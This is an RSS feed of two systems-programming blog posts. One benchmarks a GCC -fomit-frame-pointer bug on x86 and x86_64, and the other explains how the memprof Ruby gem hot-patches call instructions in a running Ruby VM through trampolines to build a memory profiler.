<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>time to bleed by Joe Damato &#187; testing</title>
	<atom:link href="http://timetobleed.com/category/testing/feed/" rel="self" type="application/rss+xml" />
	<link>http://timetobleed.com</link>
	<description>technical ramblings from a wanna-be unix dinosaur</description>
	<lastBuildDate>Tue, 05 Jul 2011 13:00:09 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>GCC optimization flag makes your 64bit binary fatter and slower</title>
		<link>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/</link>
		<comments>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/#comments</comments>
		<pubDate>Tue, 20 Jul 2010 12:59:53 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1909</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. The intention of this post is to highlight a subtle GCC optimization bug that leads to slower and larger code being generated than would have been generated without the optimization flag. UPDATED: Graphs are now 0 based on the y [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/large_bug.jpg" alt="" width="300" height="400" /></center><br />
If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<p>The intention of this post is to highlight a subtle GCC optimization bug that leads to slower and larger code being generated than would have been generated without the optimization flag.</p>
<h2>UPDATED: Graphs are now zero-based on the y-axis. The tidbits section (below the conclusion) now links to my ugly test harness and to a terminal session showing the build of the test case from the bug report, its objdump output, and the corresponding system information.</h2>
<h2>Hold the #gccfail tweets, son.</h2>
<p>Everyone fucks up. The point of this post is <em>not</em> to rag on GCC. If writing a C compiler were easy then every asshole with a keyboard would write one for fun.</p>
<h2>WARNING: THERE IS MATH, SCIENCE, AND GRAPHS BELOW.</h2>
<p>Watch yourself.</p>
<h2>The original bug report for <code>-fomit-frame-pointer</code>.</h2>
<p>I stumbled across a <a href="http://gcc.gnu.org/bugzilla/show_bug.cgi?id=44958">bug report for GCC</a> that was very interesting. It points out a very subtle bug that occurs when the <code>-fomit-frame-pointer</code> flag is passed to GCC. The bug report is for 32bit code; however, after some testing I found that this bug <strong>also rears its head in 64bit code</strong>.</p>
<h2>What is <code>-fomit-frame-pointer</code> supposed to do?</h2>
<p>The <code>-fomit-frame-pointer</code> flag is intended to direct GCC to avoid saving and restoring the frame pointer (<code>%ebp</code> or <code>%rbp</code>). This is supposed to make function calls faster, since the function is doing less work each invocation. It should also make function code take fewer bytes since there are fewer instructions being executed.</p>
<p>A caveat of using <code>-fomit-frame-pointer</code> is that it <em>may</em> make <strong>debugging impossible</strong> on certain systems. To combat this on Linux, <code>.debug_frame</code> and <code>.eh_frame</code> sections are added to ELF binaries to assist in the stack unwinding process when the frame pointer is omitted.</p>
<h2>What is the bug?</h2>
<p>The bug is that when <code>-fomit-frame-pointer</code> is used, GCC erroneously uses the frame pointer register as a general purpose register <em>when a different register could be used instead</em>.</p>
<p><strong>wat.</strong></p>
<p>The amd64 and i386 ABIs<sup>1</sup> <sup>2</sup> specify a list of caller and callee saved registers.</p>
<ul>
<li>The frame pointer register is callee saved. That means that if a function is going to use the frame pointer register, it must save and restore the value in the register.</li>
<li>The test case provided in the bug report shows that other <em>caller</em> saved registers were available for use.</li>
<li>Had the function used a caller saved register instead, there would be <em>no need</em> for the additional save and restore instructions in the function.</li>
<li>Removing those instructions would take fewer bytes and execute faster.</li>
</ul>
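<p>To make the caller saved versus callee saved split concrete, here is a minimal sketch of a lookup for the amd64 case. The register list follows the System V AMD64 ABI rule that <code>%rbx</code>, <code>%rbp</code>, and <code>%r12</code> through <code>%r15</code> belong to the caller; the array and function names are made up for illustration.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Registers that "belong" to the calling function under the System V
 * AMD64 ABI: a callee that modifies one must save and restore it.
 * (Names here are illustrative, not taken from any real tool.) */
static const char *const amd64_callee_saved[] = {
    "rbx", "rbp", "r12", "r13", "r14", "r15",
};

/* Returns true if using `reg` inside a function costs a save/restore. */
bool is_callee_saved(const char *reg)
{
    size_t n = sizeof(amd64_callee_saved) / sizeof(amd64_callee_saved[0]);

    for (size_t i = 0; i < n; i++) {
        if (strcmp(reg, amd64_callee_saved[i]) == 0)
            return true;
    }
    return false;
}
```

<p>Picking <code>rbp</code> as a scratch register costs a save and a restore, while a caller saved register such as <code>rax</code> or <code>r11</code> would have been free to clobber.</p>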
<h2>What are the consequences?</h2>
<p>Let&#8217;s take a look at two potential pieces of code.</p>
<p>The first piece is the code that would be generated if <code>-fomit-frame-pointer</code> <strong>is not used</strong>:</p>
<pre class="prettyprint">test1:
        pushq %rbp       ; save frame pointer
        movq %rsp,%rbp   ; update frame pointer to the current stack pointer
           ; here is where your function would do work
        leave            ; restore the stack pointer and frame pointer
        ret              ; return</pre>
<p><strong>Size: 6 bytes</strong>.</p>
<p>The above assembly sequence uses the frame pointer.</p>
<p>Let&#8217;s take a look at the code that is generated by GCC when <code>-fomit-frame-pointer</code> is used:</p>
<pre class="prettyprint">        sub $0x8, %rsp    ; make room on the stack
        movq %rbp, (%rsp) ; store rbp on the stack
          ; here is where your function would modify and use %rbp as needed
        movq (%rsp), %rbp ; restore %rbp
        add $0x8, %rsp    ; get rid of the extra stack space
        ret               ; return</pre>
<p><strong>Size: 17 bytes</strong>.</p>
<p>The above assembly sequence is what is generated when GCC decides to use the frame pointer register as a general purpose register. Since it is callee saved, it must be saved before being modified and restored after being modified.</p>
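<p>If you want to check the byte counts yourself, the sketch below spells out the machine code for both sequences as byte arrays and lets <code>sizeof</code> do the counting. The encodings are what I would expect a typical assembler to emit for these instructions; treat them as an assumption and compare against your own <code>objdump</code> output. The array and function names are made up for illustration.</p>

```c
#include <stddef.h>

/* test1: the usual frame pointer prologue and epilogue. */
static const unsigned char with_frame_pointer[] = {
    0x55,                   /* push %rbp        */
    0x48, 0x89, 0xe5,       /* mov  %rsp,%rbp   */
    0xc9,                   /* leave            */
    0xc3,                   /* ret              */
};

/* test2: %rbp used as a general purpose register, so it is spilled
 * to the stack and reloaded around the function body. */
static const unsigned char rbp_as_general_purpose[] = {
    0x48, 0x83, 0xec, 0x08, /* sub  $0x8,%rsp   */
    0x48, 0x89, 0x2c, 0x24, /* mov  %rbp,(%rsp) */
    0x48, 0x8b, 0x2c, 0x24, /* mov  (%rsp),%rbp */
    0x48, 0x83, 0xc4, 0x08, /* add  $0x8,%rsp   */
    0xc3,                   /* ret              */
};

size_t size_with_frame_pointer(void)
{
    return sizeof(with_frame_pointer);
}

size_t size_rbp_as_general_purpose(void)
{
    return sizeof(rbp_as_general_purpose);
}
```

<p>The first sequence comes out to 6 bytes and the second to 17, matching the sizes quoted above.</p>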
<h2>So <code>-fomit-frame-pointer</code> makes your binary fatter, but does it make it slower?</h2>
<p>Only one way to find out: <strong>do science.</strong></p>
<p>I built a simple (and very ugly) testing harness to test the above pieces of code to determine which piece of code is faster. Before we get into the benchmark results, I want to tell you why my benchmark is <em>bullshit</em>.</p>
<p>Yes, <em>bullshit</em>.</p>
<p>You see, it makes me sad when people post benchmarks and neglect to tell others why their benchmark may be inaccurate. So, lemme start the trend.</p>
<p>This benchmark is useless because:</p>
<ul>
<li>Reading the CPU cycle counter is unreliable (more on this below the conclusion), so I also tracked wall clock time.</li>
<li>I don&#8217;t have the ideal test environment. I ran this on bare metal hardware, and set the CPU affinity to keep the process pinned to a single CPU&#8230; <strong>BUT</strong></li>
<li><strong>I could have done better</strong> if I had pinned <code>init</code> to CPU0 (thereby forcing all children of init to be pinned to CPU0 &#8211; <strong>remember child processes inherit the affinity mask</strong>). I would have then had an entire CPU for nothing but my benchmark.</li>
<li><strong>I could have done better</strong> if I forced the CPU running my benchmark program to not handle any IRQs.</li>
<li><b>I only tested one version of GCC</b>: (Debian 4.3.2-1.1) 4.3.2</li>
<li><strong>I could have</strong> taken more samples.</li>
</ul>
<p>You can find more testing harness tidbits below the conclusion.</p>
<h2>Benchmark Results</h2>
<p>
<b>test 1</b> &#8212; Code sequence simulating using the  frame pointer.<br />
<b>test 2</b> &#8212; Code sequence simulating using the frame pointer as a general purpose register.
</p>
<h2>64bit results</h2>
<p><b><u>Using <code>-fomit-frame-pointer</code> is SLOWER (contrary to what you&#8217;d expect) than not using it!</u></b></p>
<table border="1" bordercolor="#000000" style="background-color:#ffffff" width="600" cellpadding="1" cellspacing="0">
<tr>
<td></td>
<td>cycles test 1</td>
<td>cycles test 2</td>
<td>microsecs test 1</td>
<td>microsecs test 2</td>
</tr>
<tr>
<td>mean</td>
<td>3514422987.92</td>
<td>4559685515.66</td>
<td>1882707.27</td>
<td>2442663.94</td>
</tr>
<tr>
<td>median</td>
<td>3507007423.5</td>
<td>4562511684.5</td>
<td>1878721.5</td>
<td>2444171.5</td>
</tr>
<tr>
<td>max</td>
<td>3922780211</td>
<td>4672066854</td>
<td>2101457</td>
<td>2502869</td>
</tr>
<tr>
<td>min</td>
<td>3502194976</td>
<td>4327782795</td>
<td>1876113</td>
<td>2318452</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>std dev</td>
<td>31927179.5632</td>
<td>15449507.8196</td>
<td>17103.7755</td>
<td>8275.49788</td>
</tr>
<tr>
<td>variance</td>
<td>1.02E+15</td>
<td>238687291867021</td>
<td>292539135.936</td>
<td>68483865.11835</td>
</tr>
</table>
<p></p>
<p>
<img src="http://timetobleed.com/images/64bit_cycles.png" alt="" />
</p>
<p>
<br />
<img src="http://timetobleed.com/images/64bit_microsecs.png" alt="" />
</p>
<p></p>
<h2>32bit results</h2>
<p><b><u>Using <code>-fomit-frame-pointer</code> is FASTER (as it should be) than not using it! The binary is still fatter, though.</u></b></p>
<table border="1" bordercolor="#000000" style="background-color:#ffffff" width="600" cellpadding="1" cellspacing="0">
<tr>
<td></td>
<td>cycles test 1</td>
<td>cycles test 2</td>
<td>microsecs test 1</td>
<td>microsecs test 2</td>
</tr>
<tr>
<td>mean</td>
<td>3502932799.49</td>
<td>3491263364.89</td>
<td>1876553.08</td>
<td>1870301.35</td>
</tr>
<tr>
<td>median</td>
<td>3501486586.5 </td>
<td>3492013955.5</td>
<td>1875778</td>
<td>1870702.5</td>
</tr>
<tr>
<td>max</td>
<td>3905163528</td>
<td>3731985243</td>
<td>2092032</td>
<td>1999259</td>
</tr>
<tr>
<td>min</td>
<td>3500916510</td>
<td>3408834436</td>
<td>1875472</td>
<td>1826144</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>std dev</td>
<td>10066939.1113</td>
<td>7992367.6913</td>
<td>5393.0412</td>
<td>4281.5466</td>
</tr>
<tr>
<td>variance</td>
<td>101343263071403</td>
<td>63877941312996.4</td>
<td>29084893.2588</td>
<td>18331640.9459</td>
</tr>
</table>
<p></p>
<p>
<img src="http://timetobleed.com/images/32bit_cycles.png" alt="" />
</p>
<p>
<br />
<img src="http://timetobleed.com/images/32bit_microsecs.png" alt="" />
</p>
<h2>Conclusion</h2>
<ul>
<li>GCC is a really complex piece of software; this bug is very subtle and may have existed for a while.</li>
<li>I&#8217;ve said this a few times, but knowing and understanding your system&#8217;s ABI is crucial for catching bugs like these.</li>
<li>Math and science are cool now, much like computers. You should use both.</li>
</ul>
<h2>Testing harness tidbits</h2>
<p>Each <strong>run</strong> of the benchmark executes either <code>test1</code> or <code>test2</code> (from above) 500,000,000 times. I did around 2500 runs for each test function.<br />
</p>
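<p>Since each run makes a fixed number of calls, the per-run means in the tables can be turned into a rough per-call cost. The helpers below are a small sketch of that arithmetic (the function names are mine). Plugging in the 64bit means gives roughly 7.03 cycles per call for test 1 and 9.12 for test 2, or about 29.7% slower; those figures include the loop overhead of the harness, so take them as ballpark numbers only.</p>

```c
/* Average cost of a single call, given the cycle count for a whole run. */
double cycles_per_call(double cycles_per_run, double calls_per_run)
{
    return cycles_per_run / calls_per_run;
}

/* Percentage by which `slow` exceeds `fast`. */
double percent_slower(double fast, double slow)
{
    return (slow - fast) / fast * 100.0;
}
```

<p>For example, <code>percent_slower(3514422987.92, 4559685515.66)</code> uses the two 64bit cycle means from the table above.</p>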
<p>
You can get the testing harness, a build script, and a test script here: <a href="http://gist.github.com/483524">http://gist.github.com/483524</a>
</p>
<p>You can look at the terminal session where I build the test from the original bug report on my system: <a href="http://gist.github.com/483494">http://gist.github.com/483494</a>
</p>
<p>
The code I used to read the CPU cycle counter looks like this:</p>
<pre class="prettyprint">static __inline__ unsigned long long rdtsc(void)
{
  unsigned long hi = 0, lo = 0;
  __asm__ __volatile__ ("lfence\n\trdtsc" : "=a"(lo), "=d"(hi));
  return ( (unsigned long long)lo)|( ((unsigned long long)hi)<<32 );
}</pre>
</p>
<p>
The <code>lfence</code> instruction is a load fence: it does not execute until all load instructions issued before it have completed, and no later instruction begins executing until it finishes. (Strictly speaking, it is not a fully serializing instruction in the way <code>cpuid</code> is.) I used it to make sure that the cycle counter was read only after all operations in the test functions had executed.<br />
<br />
The values returned by this function are misleading because CPU frequency may be scaled at any time. This is why I also measured wall clock time.<br />
</p>
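<p>For the wall clock side, something along these lines would do. This is a sketch and not the code from my harness: it assumes a POSIX system with <code>clock_gettime</code> and <code>CLOCK_MONOTONIC</code>, and the function names are made up for illustration.</p>

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <time.h>

/* Microseconds between two timestamps (end is assumed to be later). */
int64_t elapsed_usec(struct timespec start, struct timespec end)
{
    int64_t sec  = (int64_t)end.tv_sec - (int64_t)start.tv_sec;
    int64_t nsec = (int64_t)end.tv_nsec - (int64_t)start.tv_nsec;

    return (sec * 1000000000LL + nsec) / 1000;
}

/* Call fn() `calls` times and return the elapsed wall clock time in
 * microseconds. CLOCK_MONOTONIC is not affected by CPU frequency
 * scaling or by someone changing the system time mid-run. */
int64_t time_calls_usec(void (*fn)(void), long calls)
{
    struct timespec start, end;

    clock_gettime(CLOCK_MONOTONIC, &start);
    for (long i = 0; i < calls; i++)
        fn();
    clock_gettime(CLOCK_MONOTONIC, &end);

    return elapsed_usec(start, end);
}
```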
<h2>References</h2>
<ol class="footnotes"><li id="footnote_0_1909" class="footnote"><a href="http://www.sco.com/developers/devspecs/abi386-4.pdf">http://www.sco.com/developers/devspecs/abi386-4.pdf</a></li><li id="footnote_1_1909" class="footnote"><a href="http://www.x86-64.org/documentation/abi.pdf">http://www.x86-64.org/documentation/abi.pdf</a></li></ol>]]></content:encoded>
			<wfw:commentRss>http://timetobleed.com/gcc-optimization-flag-makes-your-64bit-binary-fatter-and-slower/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Rewrite your Ruby VM at runtime to hot patch useful features</title>
		<link>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/</link>
		<comments>http://timetobleed.com/rewrite-your-ruby-vm-at-runtime-to-hot-patch-useful-features/#comments</comments>
		<pubDate>Mon, 23 Nov 2009 12:59:53 +0000</pubDate>
		<dc:creator>Joe Damato</dc:creator>
				<category><![CDATA[bugfix]]></category>
		<category><![CDATA[debugging]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[monitoring]]></category>
		<category><![CDATA[python]]></category>
		<category><![CDATA[ruby]]></category>
		<category><![CDATA[systems]]></category>
		<category><![CDATA[testing]]></category>
		<category><![CDATA[x86]]></category>
		<category><![CDATA[allocator]]></category>
		<category><![CDATA[debug]]></category>
		<category><![CDATA[garbage collection]]></category>
		<category><![CDATA[GC]]></category>
		<category><![CDATA[memory]]></category>
		<category><![CDATA[x86_64]]></category>

		<guid isPermaLink="false">http://timetobleed.com/?p=1253</guid>
		<description><![CDATA[If you enjoy this article, subscribe (via RSS or e-mail) and follow me on twitter. Some notes before the blood starts flowin&#8217; CAUTION: What you are about to read is dangerous, non-portable, and (in most cases) stupid. The code and article below refer only to the x86_64 architecture. Grab some gauze. This is going to [...]]]></description>
			<content:encoded><![CDATA[<p><center><img src="http://timetobleed.com/images/tramp.png" alt="" width="400" height="300" /></center><br />
If you enjoy this article, <a rel="alternate" type="application/rss+xml" href="http://feeds.feedburner.com/TimeToBleed">subscribe (via RSS or e-mail)</a> and <a href="http://twitter.com/joedamato">follow me on twitter.</a></p>
<h2>Some notes before the blood starts flowin&#8217;</h2>
<ul>
<li><strong>CAUTION:</strong> What you are about to read is dangerous, non-portable, and (in most cases) stupid.</li>
<li>The code and article below refer only to the <strong>x86_64</strong> architecture.</li>
<li>Grab some gauze. This is going to get ugly.</li>
</ul>
<h2>TLDR</h2>
<p>This article shows off a Ruby gem which has the power to overwrite a Ruby binary <em>in memory</em> while <em>it is running</em> to allow your code to execute in place of internal VM functions. This is useful if you&#8217;d like to hook all object allocation functions to build a memory profiler.</p>
<h2>This gem is on GitHub</h2>
<p>Yes, it&#8217;s on GitHub: <a href="http://github.com/ice799/memprof">http://github.com/ice799/memprof</a>.</p>
<h2>I want a memory profiler for Ruby</h2>
<p>This whole science experiment started during <a href="http://rubyconf.org/">RubyConf</a> when <a href="http://twitter.com/tmm1">Aman</a> and I began brainstorming ways to build a memory profiling tool for Ruby.</p>
<p>The big problem in our minds was that for most tools we&#8217;d have to include patches to the Ruby VM. That process is <b>long and somewhat difficult</b>, so I started thinking about ways to do this without modifying the Ruby source code itself.</p>
<p> The memory profiler is <b>NOT DONE</b> just yet. I thought that the hack I wrote to let us build something without modifying Ruby source code was interesting enough that it warranted a blog post. So let&#8217;s get rolling.</p>
<h2>What is a trampoline?</h2>
<p>Let&#8217;s pretend you have 2 functions: <code>functionA()</code> and <code>functionB()</code>. Let&#8217;s assume that <code>functionA()</code> calls <code>functionB()</code>.</p>
<p>Now also imagine that you&#8217;d like to insert a piece of code that executes between <code>functionA()</code> and its call to <code>functionB()</code>. You could insert a piece of code that <i>diverts execution</i> elsewhere, creating the flow: <code>functionA()</code> --&gt; <code>functionC()</code> --&gt; <code>functionB()</code></p>
<p>You can accomplish this by <i>inserting a trampoline</i>.</p>
<p>A trampoline is a piece of code that program execution jumps into and then <i>bounces</i> out of and on to somewhere else<sup>1</sup>.</p>
<p>This hack relies on the use of multiple trampolines. We&#8217;ll see why shortly.</p>
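<p>Here is the idea in miniature. To be clear, this sketch cheats: it diverts the call through a plain C function pointer instead of rewriting machine code, which is a much tamer technique than the one this article is about. It only illustrates the <code>functionA()</code>, <code>functionC()</code>, <code>functionB()</code> flow; the extra helper names are made up.</p>

```c
static int hits = 0;

/* The function that was originally being called. */
int functionB(int x)
{
    return x * 2;
}

/* The trampoline: do some extra work, then bounce on to functionB(). */
int functionC(int x)
{
    hits++;
    return functionB(x);
}

/* functionA() calls through this pointer, so the call can be diverted. */
static int (*target)(int) = functionB;

int functionA(int x)
{
    return target(x);
}

/* Divert functionA()'s call so that it lands in functionC() first. */
void install_trampoline(void)
{
    target = functionC;
}

int trampoline_hits(void)
{
    return hits;
}
```

<p>After <code>install_trampoline()</code>, <code>functionA()</code> still returns the same values, but every call passes through <code>functionC()</code> on the way.</p>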
<h2>Two different kinds of trampolines</h2>
<p>There are two different kinds of trampolines that I considered while writing this hack, let&#8217;s take a closer look at both.</p>
<p>
<h3>Caller-side trampoline</h3>
<p>A <i>caller-side</i> trampoline works by overwriting the <a href="http://en.wikipedia.org/wiki/Opcodes">opcodes</a> in the <i>.text</i> segment of the program in the calling function causing it to call a different function <i>at runtime</i>.</p>
</p>
<p>The <b>big pros</b> of this method are:
<ul>
<li>You aren&#8217;t overwriting any code, only the address operand of a <code>callq</code> instruction.</li>
<li>Since you are only changing an operand, you can hook any function. You don&#8217;t need to build custom trampolines for each function.</li>
</ul>
<p> This method also has some <b>big cons</b>:
<ul>
<li>You&#8217;ll need to scan <i>the entire binary in memory</i> and find and <i>overwrite</i> all address operands of <code>callq</code>. This is problematic because if you overwrite any false-positives you might break your application.</li>
<li>You have to deal with the implications of <code>callq</code>, which can be painful as we&#8217;ll see soon.</li>
</ul>
<p><h3>Callee-side trampoline</h3>
<p>A <i>callee-side</i> trampoline works by overwriting the opcodes in the <i>.text</i> segment of the program in the called function, causing it to call another function immediately.</p>
<p>The <b>big pro</b> of this method is:
<ul>
<li>You only need to overwrite code in <i>one</i> place and don&#8217;t need to worry about accidentally scribbling on bytes that you didn&#8217;t mean to.</li>
</ul>
<p> This method has some <b>big cons</b> too:
<ul>
<li>You&#8217;ll need to carefully construct your trampoline code to overwrite as little of the function as possible (or somehow restore the opcodes), especially if you expect the original function to work as expected later.</li>
<li>You&#8217;ll need to special case each trampoline you build for different optimization levels of the binary you are hooking into.</li></ul>
<p>I went with a <i>caller-side</i> trampoline because I wanted to ensure that I can hook any function and not have to worry about different Ruby binaries causing problems when they are compiled with different optimization levels.</p>
<h2>The stage 1 trampoline</h2>
<p>To insert my trampolines I needed to <i>insert some binary into the process</i> and then overwrite <code>callq</code> instructions like this:</p>
<p><pre class="prettyprint">
  41150b:       e8 cc 4e 02 00         callq  4363dc [rb_newobj]
  411510:       48 89 45 f8             ....
</pre>
</p>
<p></p>
<p> In the above code snippet, the byte <code>e8</code> is the <code>callq</code> opcode and the bytes <code>cc 4e 02 00</code> are the distance to <code>rb_newobj</code> from the address of the next instruction, 0x411510.</p>
<p>All I need to do is change the 4 bytes following <code>e8</code> to equal the displacement between the next instruction, 0x411510 in this case, and my trampoline.</p>
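<p>The arithmetic is easy to check with a couple of helpers. This is a sketch with made-up function names, and it assumes a little-endian host (which x86_64 is). The four bytes <code>cc 4e 02 00</code> are the little-endian value 0x24ecc, and 0x411510 + 0x24ecc is 0x4363dc, the address of <code>rb_newobj</code>.</p>

```c
#include <stdint.h>
#include <string.h>

/* Where does the 5-byte `e8 rel32` call located at call_addr land? */
uint64_t call_target(uint64_t call_addr, const unsigned char insn[5])
{
    int32_t rel32;

    /* the displacement follows the opcode byte; little-endian host assumed */
    memcpy(&rel32, insn + 1, sizeof(rel32));

    /* displacements are relative to the address of the NEXT instruction */
    return call_addr + 5 + (int64_t)rel32;
}

/* Which rel32 makes a call at call_addr reach target? */
int32_t call_displacement(uint64_t call_addr, uint64_t target)
{
    return (int32_t)(target - (call_addr + 5));
}
```

<p>Hooking a call site then amounts to writing <code>call_displacement(call_site, trampoline)</code> over the four bytes after <code>e8</code>, provided the trampoline is close enough for the result to fit.</p>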
<p><b>Problem.</b></p>
<p>My first cut at this code led me to an important realization: the <code>callq</code> instructions used expect a <i>32bit displacement</i> to the function I am calling and <i>not</i> an absolute address. <b>But</b>, the 64bit address space is <i>very</i> large. The code for the Ruby binary that lives in the <code>.text</code> segment is so far away from my Ruby gem that the displacement between them <b>cannot be represented with only 32bits</b>.</p>
<p><b>So what now?</b></p>
<p>Well, luckily <code>mmap</code> has a flag <code>MAP_32BIT</code> which maps a page in the first 2GB of the address space. If I map some code there, it should be well within the range of values whose displacement I can represent in 32bits.</p>
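<p>A quick way to see the problem is a range check like the sketch below (the function name is mine). The far-away address in the usage note is a made-up but typical-looking location for a shared library on x86_64 Linux, not one taken from a real process.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* Can a callq whose next instruction is at next_insn reach target
 * using only a signed 32bit displacement? */
bool fits_rel32(uint64_t next_insn, uint64_t target)
{
    int64_t delta = (int64_t)(target - next_insn);

    return delta >= INT32_MIN && delta <= INT32_MAX;
}
```

<p>From 0x411510, a target at 0x4363dc or anywhere in the first 2GB passes the check, while something like 0x7f0000000000 does not.</p>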
<p>So, why not map a <b>second trampoline</b> to that page which contains code that can call an <i>absolute address</i>?</p>
<p>My stage 1 trampoline code looks something like this:</p>
<p>
<pre class="prettyprint">
  /* the struct below is just a sequence of bytes which represent the
    *  following bit of assembly code, including 3 nops for padding:
    *
    *  mov $address, %rbx
    *  callq *%rbx
    *  ret
    *  nop
    *  nop
    *  nop
    */
  struct tramp_tbl_entry ent = {
    .mov = {'\x48','\xbb'},
    .addr = (long long)&#038;error_tramp,
    .callq = {'\xff','\xd3'},
    .ret = '\xc3',
    .pad =  {'\x90','\x90','\x90'},
  };

  tramp_table = mmap(NULL, 4096, PROT_WRITE|PROT_READ|PROT_EXEC,
                                   MAP_32BIT|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  if (tramp_table != MAP_FAILED) {
    for (; i < 4096/sizeof(struct tramp_tbl_entry); i ++ ) {
      memcpy(tramp_table + i, &#038;ent, sizeof(struct tramp_tbl_entry));
    }
  }
}
</pre>
<p>
<p>It <code>mmap</code>s a single page and writes a table of default trampolines (like a jump table) that all call an error trampoline by default. When a new trampoline is inserted, I just go to that entry in the table and insert the address that should be called.</p>
<p>To get around the displacement challenge described above, the addresses I insert into the stage 1 trampoline table are addresses for stage 2 trampolines.</p>
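<p>The definition of <code>struct tramp_tbl_entry</code> isn&#8217;t shown above, so here is a guess at a layout that is consistent with the initializer. The <code>packed</code> attribute (a GCC and Clang extension) is my assumption: without it the compiler would pad before <code>addr</code> and the bytes would no longer form a valid instruction stream. The helper functions are made up for illustration.</p>

```c
#include <stddef.h>

/* One stage 1 trampoline: 16 bytes of machine code with a hole for
 * the 64bit address to call. Layout is an assumption, see above. */
struct tramp_tbl_entry {
    char mov[2];      /* 48 bb: mov $imm64, %rbx      */
    long long addr;   /* the imm64 operand of the mov */
    char callq[2];    /* ff d3: callq *%rbx           */
    char ret;         /* c3:    ret                   */
    char pad[3];      /* 90 90 90: nops for padding   */
} __attribute__((__packed__));

size_t tramp_entry_size(void)
{
    return sizeof(struct tramp_tbl_entry);
}

/* Offset of the address hole within one entry. */
size_t tramp_addr_offset(void)
{
    return offsetof(struct tramp_tbl_entry, addr);
}

/* How many trampolines fit in one mmap'd page? */
size_t tramp_entries_per_page(size_t page_size)
{
    return page_size / sizeof(struct tramp_tbl_entry);
}
```

<p>With this layout each entry is 16 bytes, so a single 4096 byte page holds 256 trampolines.</p>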
<h2>The stage 2 trampoline</h2>
<p>Setting up the stage 2 trampolines is pretty simple once the stage 1 trampoline table has been written to memory. All that needs to be done is update the address field in a free stage 1 trampoline to be the address of my stage 2 trampoline. These trampolines are written in C and live in my Ruby gem.</p>
<p>
<pre class="prettyprint">
static void
insert_tramp(char *trampee, void *tramp) {
  void *trampee_addr = find_symbol(trampee);
  int entry = tramp_size;
  tramp_table[tramp_size].addr = (long long)tramp;
  tramp_size++;
  update_image(entry, trampee_addr);
}
</pre>
</p>
<p>
<p>An example of a stage 2 trampoline for <code>rb_newobj</code> might be:</p>
<p>
<pre class="prettyprint">
static VALUE
newobj_tramp() {
  /* print the ruby source and line number where the allocation is occurring */
  printf("source = %s, line = %d\n", ruby_sourcefile, ruby_sourceline);

  /* call newobj like normal so the ruby app can continue */
  return rb_newobj();
}
</pre>
</p>
<h2>Programmatically rewriting the Ruby binary in memory</h2>
<p>Overwriting the Ruby binary to cause my stage 1 trampolines to get hit is pretty simple, too. I can just scan the <code>.text</code> segment of the binary looking for bytes which look like <code>callq</code> instructions. Then, I can sanity check by reading the next 4 bytes which should be the displacement to the original function. Doing that sanity check should prevent false positives.</p>
<pre class="prettyprint">
static void
update_image(int entry, void *trampee_addr) {
  char *byte = text_segment;
  size_t count = 0;
  int fn_addr = 0;
  void *aligned_addr = NULL;

 /* check each byte in the .text segment */
  for(; count < text_segment_len; count++) {

    /* if it looks like a callq instruction... */
    if (*byte == '\xe8') {

      /* the next 4 bytes SHOULD BE the original displacement */
      fn_addr = *(int *)(byte+1);

      /* do a sanity check to make sure the next few bytes are an accurate displacement.
        * this helps to eliminate false positives.
        */
      if (trampee_addr - (void *)(byte+5) == fn_addr) {
        aligned_addr = (void*)(((long)byte+1)&#038;~(0xffff));

        /* mark the page in the .text segment as writable so it can be modified */
        mprotect(aligned_addr, (void *)byte+1 - aligned_addr + 10,
                       PROT_READ|PROT_WRITE|PROT_EXEC);

        /* calculate the new displacement and write it */
        *(int  *)(byte+1) = (uint32_t)((void *)(tramp_table + entry)
                                     - (void *)(byte + 5));

        /* disallow writing to this page of the .text segment again  */
        mprotect(aligned_addr, (((void *)byte+1) - aligned_addr) + 10,
                      PROT_READ|PROT_EXEC);
      }
    }
    byte++;
  }
}
</pre>
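<p>One detail worth calling out: the mask <code>~(0xffff)</code> above rounds down to a 64KB boundary, which is page aligned on a system with 4KB pages but makes more memory writable than strictly necessary. A tighter version would round down to the real page size, for example the value reported by <code>sysconf(_SC_PAGESIZE)</code>. The helpers below are a sketch of that calculation with made-up names; they assume the page size is a power of two.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Round addr down to the start of the page containing it.
 * page_size must be a power of two. */
uintptr_t page_floor(uintptr_t addr, uintptr_t page_size)
{
    return addr & ~(page_size - 1);
}

/* Length to pass to mprotect so that it covers the bytes
 * [addr, addr + len) when starting from page_floor(addr). */
size_t span_from_page(uintptr_t addr, size_t len, uintptr_t page_size)
{
    return (size_t)(addr - page_floor(addr, page_size)) + len;
}
```

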